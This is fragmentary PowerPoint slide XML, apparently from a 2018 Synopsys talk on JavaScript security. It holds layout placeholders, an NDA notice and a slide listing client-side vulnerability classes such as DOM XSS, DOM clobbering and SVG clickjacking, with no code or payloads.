            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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0233358" y="485435"/>
            <a:ext cx="1653211" cy="529027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4108495"/>
            <a:ext cx="10962523" cy="731520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter’s Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4861720"/>
            <a:ext cx="4876800" cy="396815"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3094851"/>
            <a:ext cx="10963923" cy="917516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx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Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1895641"/>
            <a:ext cx="10972800" cy="1177506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2538705328"/>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gal Disclosure NDA">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="609601"/>
            <a:ext cx="10972800" cy="452596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027113"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US" b="1" dirty="0"/>
              <a:t>CONFIDENTIAL INFORMATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following material is confidential information of Synopsys and is being disclosed to you pursuant to a non-disclosure agreement between you or your employer and Synopsys. The material being disclosed may only be used as permitted under such non-disclosure agreement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IMPORTANT NOTICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the event information in this presentation reflects Synopsys’ future plans, such plans are as of the date of this presentation and are subject to change. Synopsys is not obligated to develop the products with the features and functionality discussed in these materials. In any event, Synopsys’ products may be offered and purchased only pursuant to an authorized quote and purchase order or a mutually agreed upon written contract. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27207422"/>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3945">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="37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609600" y="68574"/>
            <a:ext cx="11582400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="10972800" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr/>
            </a:lvl6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2" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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3348340793"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>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7">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="52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48F746-CEB3-4F47-8DCC-9A7E1FDEAD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="-9" y="1215389"/>
            <a:ext cx="12192357" cy="1295438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="11582400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFF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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2688610"/>
            <a:ext cx="10058400" cy="3559791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="1867"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add agenda topics --- no bullets here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191274175"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="1693">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="960">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="7296">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3945">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D20E43-B3EE-4B3C-8232-551DC61A70ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="-1" y="2021760"/>
            <a:ext cx="12192005" cy="2540001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="2010333"/>
            <a:ext cx="10384465" cy="1253863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title – Transition Slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="3430818"/>
            <a:ext cx="10384465" cy="1119515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400" i="1">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67723627"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="384">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="6936">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Subtitle">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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="5384800" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="1414463"/>
            <a:ext cx="5384800" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr baseline="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr baseline="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="838200"/>
            <a:ext cx="11582400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105608892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384">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7296">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="888">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3945">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="52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9876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23"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="68574"/>
            <a:ext cx="11581896"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custDataLst>
              <p:tags r:id="rId24"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="10972800" cy="484822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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId25"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11101153" y="6542971"/>
            <a:ext cx="881902" cy="217536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId26"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="163812" y="6516189"/>
            <a:ext cx="3759200" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2018 Synopsys, Inc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId27"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157671" y="6516189"/>
            <a:ext cx="853440" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{CAE2347F-76BC-4690-80B5-B24BA0EA7B0A}" type="slidenum">
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TaggedShape" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId28"/>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aggedShape" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId29"/>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 name="TaggedShape" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId30"/>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6" name="TaggedShape" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId31"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12700" cy="12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04937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A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">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dium.com/front-end-hacking/server-side-rendering-with-react-and-express-382591bfc77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redux.js.org/docs/recipes/ServerRendering.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reactjs.org/docs/typechecking-with-proptype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github.com/yannickcr/eslint-plugin-reac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ksenia@synopsys.com"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1.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synopsys.com/softwa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to                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript [In]Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3329906"/>
            <a:ext cx="10963923" cy="917516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ksenia Peguero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537" y="2221166"/>
            <a:ext cx="2466681" cy="1152256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250274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Client-side JavaScript Security Concerns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1566867"/>
            <a:ext cx="5080000" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting, the DOM kind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expression Language Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SVG Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM Clobbering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side Trust Issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF (partially)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Leakage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008" y="1566867"/>
            <a:ext cx="5346790" cy="3858768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
